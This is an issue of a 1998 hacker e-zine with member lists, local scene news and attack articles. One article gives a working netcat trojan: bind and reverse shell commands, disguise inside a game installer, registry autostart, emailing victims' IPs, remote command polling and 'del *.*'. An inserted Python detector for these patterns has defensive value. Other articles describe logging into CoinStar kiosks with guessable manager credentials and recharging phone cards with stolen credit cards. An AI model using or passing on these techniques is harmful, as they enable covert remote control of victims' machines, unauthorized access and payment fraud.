Computer Academic Underground
Electronic Magazine
#0019
0515.98

##############################################################################

Table of Contents

Foreword
General
    Member Listing                          -= CAU =-
    Cablemodem Info For 817 Area            uv
Hacking
    NetKitten With Hats                     protocol
    Magical Coins                           sandspidr
    Exploit of the Month                    -= CAU =-
Phreaking
    Rechargeable Phone Cards                I)ruid
    817.788.XXXX                            -= CAU =-
Local Scene
    Bulletin Board Systems                  -= CAU =-
    817 2600 Meeting                        -= CAU =-
Closing

##############################################################################

Foreword

Well, this month we seem to have a great issue. Excellent article by Protocol, and an article on Coinstar machines from the first contributor to the zine that I actually have no idea who he is (everyone that has contributed up until now I either know in person or from IRC). Anyway, the 817 2600 meeting is growing, with more and more attendees every month, so check out the 2600 information below, and if you're in the area, show up! I've also decided to add a section that may or may not appear in future issues called "Local Scene", where we will try to keep an updated list of local (817, 972, 214) BBS's, meetings, and other local related stuff. Also, if you're not on the HackIt! development list, a little update: I have just about got done with the redesign, and will probably be able to release HackIt! 2.0.0 sometime in the next month or so, and there's also a Windows 95 version that's almost done as well. Anyway, that's all the updates for this month, on to the articles...

I)ruid

##############################################################################

General

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Member Listing
(In the order in which they were brought into the CAU)

Handle              IRC Nick      E-Mail
--------------------------------------------------------------
I)ruid              I}ruid        druid@caughq.org
ultra violet        uv_           uv@caughq.org
Crimson Assassin    Crimson_A     crimson@caughq.org
Fizban              Fizban^       fizban@caughq.org
Sublime             sublime       sublime@caughq.org
int3l               int3l         int3l@caughq.org
MajestiX            maJesTix      majestix@caughq.org
--------------------------------------------------------------

-= CAU =-

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Cablemodem Info For 817 Area

There has been cable modem hype for about 1/2 a year and finally they're in 817! (or at least almost) There is a working demo of a cable modem at CompUSA off of 183 in Hurst. I have recently called a few local providers: TCI and Marcus. TCI seems to have operators that just bull shyt. Three different operators gave me three different dates when cable modems would be offered in my area. Marcus seems to be a little more organized.

INFO:

#'s:  817.429.1096
      817.577.9577

Installation and modem purchase: $299.00
  *note: this operator told me you had to buy the modem; however, if you decided you didn't want the service they would buy it back.

Monthly: if you have Marcus Cable I was told $39.95/month

Tech: Supposedly you are not allowed to host a web page (yea right). When you sign up you get a static IP (they issue them with DHCP). *YUCK* They told me they use DHCP just so it would be easier to update info.
Modem info: the coax plugs into the back of the modem (external); the modem plugs into the netcard via coax.

Requirements (supposedly):
  win95/NT
  Network card
  10 mb (I'm assuming for their software)
  16 mb (software)
  *note: I don't see any reason you couldn't use any OS that supports routing through ethernet cards.

SPEED!: The guy at Marcus said that it averages out to about 1-3 mb/s. He also said that it depends on the time of day. Probably a high of 9 mb/sec at slow times, like 3am perhaps.

Conclusion: For any net addict that desires a rather fast dedicated connection to the net, start saving yer lunch money.

l8r
-uv 98

##############################################################################

Hacking

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

NetKitten With Hats

Well my pets, we are long overdue for a Trojan, and what better way to make use of those pesky Win 95 boxes than to put up a telnet server? Well, netcat out of the box does this with just one command line:

    nc -L -d -p 23 -e c:\command.com

The -L makes nc listen again after a disconnect. The -d is to detach from console (a stealth feature). The -p is for... well, if you can't figure it out don't bother reading further. The -e hooks up the input/output of the program to netcat.

Now the next thing we need is a delivery method for this command. Colidus and I decided on a South Park game. The original setup program was renamed and a batch file was created that copied our copy of nc (renamed system32 so the user wouldn't kill it when seen in the task list) and ran regedit, which imported a .reg file that launched our program at startup.

Now this is all well and good, but it doesn't tell us when this machine is ready to use. So we made a batch file for nc that ran the win95 equivalent of ifconfig and dumped the machine's IP to a file and mailed it to a hotmail account (gotta love the hotmail guys). So this works great, right? Well, my so easily satisfied reader, NO!
Several bad things: we're using an external command to get the machine's IP, we're using a batch file, and this method will not allow free access to a machine behind a firewall. So to stop the first two problems we needed the source to nc. Easy enough, it's in the tgz or zip.

[ EDITOR'S NOTE: This is so that a routine to grab the local IP can be hardcoded into netcat, as well as code to grab registry keys and generate the machine ID (explained below). ]

So now for the second problem: how to get to a machine that's behind a firewall. Well, you could push the shell (command.com) to yourself by making the machine behind the firewall start the connection. This is allowed by most firewall configurations. You could beef it up a bit by using port 53 (a DNS request), which is almost always allowed, or using multiple port requests until one goes thru, although this might set off alarms.

     Machine behind firewall                               Listening Machine
  ------------------------------------         |-|         -----------------
 |                                    |        |F|        |                 |
 |  nc -e command.com target.com 23   |_1024+__|W|___23___|   nc -L -p 23   |
 |                                    |        | |        |                 |
  ------------------------------------         |-|         -----------------

Looks great, but it doesn't work. It's not nc's fault, it's command.com's. Command.com doesn't handle stdin/stdout correctly, so we had to find a replacement for it. We popped on #cdc and asked Weld about it, but he had not heard of this bug (and hadn't tried to push a shell to a listening machine), but he tried it on Windows NT and it worked. I remembered 4DOS from days gone by and went about finding it. Colidus tested 4DOS, but it was a bust. Because Windows NT worked, he tried 4NT (4DOS for NT) on the 95 machine and it worked like a charm.

The next problem was getting the IP and port number for the listening machine to the attacking machine. This could be hard-coded, but that would be easy to track down, doesn't let you use dynamic IPs, and only lets you have one connection at a time.
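[ EDITOR'S NOTE: The following is an added example, not code from Protocol or from netcat, showing how the three behaviours described above (a listener handing command.com to the socket via -e, a shell pushed outbound over tcp/53, and a renamed nc copy autostarted from a Run key) can be picked out of a host snapshot. The Proc/Sock records and the snapshot are constructed; the ".exe" on the renamed binary and the "dns" name test for legitimate tcp/53 clients are assumptions. ]

```python
"""Heuristics for the netcat trojan pattern in the article: a -e shell listener, a shell
pushed outbound over tcp/53, and a renamed nc autostarted from a Run key. Data is constructed."""
import re
from collections import namedtuple

SHELLS = {"command.com", "cmd.exe", "4nt.exe", "4dos.com"}
Proc = namedtuple("Proc", "pid image cmdline")        # image = path of the executable
Sock = namedtuple("Sock", "pid state lport rport")    # state = LISTEN / ESTABLISHED

def basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]

def exec_target(cmdline: str):
    """Program handed to netcat's -e, or None if the flag is absent."""
    m = re.search(r"(?:^|\s)-e\s+(\S+)", cmdline, re.I)
    return basename(m.group(1)) if m else None

def review(procs, socks, run_keys):
    """Return (pid, reason) findings; pid is None for registry findings."""
    findings, flagged = [], set()
    for p in procs:
        tgt = exec_target(p.cmdline)
        if tgt in SHELLS:
            findings.append((p.pid, f"-e hands {tgt} to the socket"))
            flagged.add(basename(p.image))
        for s in socks:
            if s.pid != p.pid:
                continue
            if s.state == "LISTEN" and tgt in SHELLS:
                findings.append((p.pid, f"shell listener on tcp/{s.lport}"))
            # assumption: only a resolver (image name contains "dns") should speak tcp/53
            if s.state == "ESTABLISHED" and s.rport == 53 and "dns" not in basename(p.image):
                findings.append((p.pid, "non-resolver outbound tcp/53"))
    for name, value in run_keys:  # autostart entry for a binary flagged above
        target = basename(value.split()[0])
        if target in flagged:
            findings.append((None, f"Run key {name!r} starts {target}"))
    return findings

# Constructed sample snapshot; the ".exe" on the renamed nc copy is an assumption.
PROCS = [Proc(101, r"c:\windows\system32.exe", r"system32 -L -d -p 23 -e c:\command.com"),
         Proc(102, r"c:\windows\explorer.exe", "explorer"),
         Proc(103, r"c:\temp\nc.exe", "nc -e 4nt.exe target.example 53")]
SOCKS = [Sock(101, "LISTEN", 23, 0), Sock(103, "ESTABLISHED", 1034, 53)]
RUN_KEYS = [("sysmon", r"c:\windows\system32.exe"), ("tray", r"c:\windows\systray.exe")]

if __name__ == "__main__":
    for pid, why in review(PROCS, SOCKS, RUN_KEYS):
        print(pid, why)
```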
So instead we decided to have the machine grab a random number and use that as an ID, then e-mail that with the IP and some registry keys (ones for machine name, e-mail address, user name, etc.), and then check a web page (Geocities, for example) for commands to execute. Those commands can be anything (some examples are below) that you can type in the 'Run' command from the Win 95 Start bar. Be aware that lots of commands that are run can be seen by the user. One command is of course to forward 4NT. I'll leave you with a few others, but you can always use your imagination:

    Net view
    Net use whatever
    Start www.caughq.org
    echo gotcha now sucker! > c:\gotcha.txt
    Start notepad c:\gotcha.txt
    Start blank.scr        (lots of fun if you d/l a password protected screen saver)
    ftp -s script.txt      (had some problems with this using command.com but haven't tried w/4NT)
    del *.*                (just kidding, don't do anything I wouldn't do)
    start marquee.scr      (even better than blank, with a funny message and password protected)

Protocol
the way things talk to other things

[ EDITOR'S NOTE: I)ruid and Colidus demonstrated this hack on CNN World News. We will have an AVI of the broadcast on the CAUGHQ website as soon as I can get ahold of it. ]

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

~~ MAGICAL COINS ~~

Have you ever seen those nasty little green machines at your supermarket called "CoinStar?" These wastes of data will count your change and take 10 cents out of every dollar! After looking at this piece of shit machine for a few minutes, I noticed a phone cord running out of the back of it, so I followed the cord halfway around the store to a phone jack. It had a phone number written on it, so I wrote it down for later use. Later that evening I dialed the number and got connected at 14.4bps. It then brought me to a login prompt. From here I was a bit stumped. So I did a "pretext" call to 1-800-644-COIN (CoinStar Customer Service).
Though the operator wasn't too shabby on giving me the information I wanted, I managed to get a lot of info. I found that managers of the store login as "manager" and their PIN number is between 4-8 digits. The software is made by a company called QNX.

[ EDITOR'S NOTE: The company is actually QNX Software Systems, Ltd. (http://www.qnx.com), creators of the QNX Operating System ]

The O/S is QNX version 4.22. (You will see what version it is by connecting to the machine.) After about 10 tries at the password, I finally got in. Login as "manager" and use the store's ID number, ex: 789. The password usually repeats, so it would be 789789. Most of these machines are found in Giant Eagles.

[ EDITOR'S NOTE: In the Dallas/Fort Worth area, check Tom Thumb Supermarkets ]

If you want to find the CoinStar machine nearest you, go to their page... http://www.coinstar.com. After looking around for about 35 minutes, I realized that I could change the color, language, and money returns. I realized that I could make the machine give money instead of taking 10 cents off a dollar, but I'm not some coin thief and didn't want to get busted over some lame ass coins. If someone does decide to change the money outgoing... I DO NOT take responsibility for your actions.

HAVE PHUN

sandspidr
sandspidr@usa.net

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Exploit of the Month

This month's exploit of the month goes to the vulnerability in the Xaw and neXtaw widgets. These widgets contain some code that does not properly bounds check, resulting in code that can be overflowed to smash the stack and gain a root shell. Some older suid X programs such as xterm contain this code, and xterm was used for the exploit; however, other X programs contain this code as well. Exploit code is contained in the external file "xterm.Xaw_exp.c". This exploit was recently reported to the Bugtraq mailing list.
-= CAU =-

##############################################################################

Phreaking

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Rechargeable Phone Cards

This month I'm going to introduce you all to the wondrous Rechargeable Phone Card. This little card is provided by New Media Telecommunications, Inc. (http://www.nmti.net) and can be obtained for free from a number of sources. Here locally, you can find them at gas stations and vendors at the First Saturday Sidewalk Sale. If you feel like paying a startup fee, you can receive about 150 of these cards from New Media Telecommunications, and receive a commission every time someone uses one of the cards out of your pack. However, the money-making opportunities are not why I'm writing this article, although they are worth a mention.

The beauty of this little card is the fact that it's a completely automated system. There is no human representative to talk to at all. What this means is that when you recharge your card, it's a touch-tone system, making it extremely easy to use a fraudulent credit card, or some other electronic method of payment, to recharge your card. From any touch tone phone you can dial their 800 number (1.800.739.5253), enter your authorization code at the prompt (found on your individual rechargeable phone card), and from then on have access to a range of functions including domestic calls, international calls, as well as the option to recharge your card using VISA, MasterCard, American Express, or Discover, and check the balance existing for that particular card, all completely automated.

After you have entered your authorization code, domestic calls are made by dialing "1", the area code, then the number. International calls are made by dialing "011", then the country code, then the city code, then the telephone number.
To recharge your card, you simply hit "#" and the credit card number, and for additional calls or your current balance, you simply hit "**". You can recharge your card through this system, or by sending a check or money order with your Authorization Code to P.O. Box 12109, La Jolla, CA 92039, but why would anyone want to do that when it's so easy to recharge it via your touch tone phone. Each card has a Commission Identification Number printed in the lower right-hand corner, identifying the vendor who is making commission off of each and every call you make using that card. Also printed on every card is the New Media Telecommunications Customer Service Number, which is 1.619.558.3337. Obviously, you people that find credit card fraud not to be a problem will find this freely available phone card a valuable resource; however, I don't condone using other people's credit cards, unless you don't mind this company having logs of everyone you call using each individual card, and sending law enforcement to your house after you abuse someone else's credit card.

I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

817.788.XXXX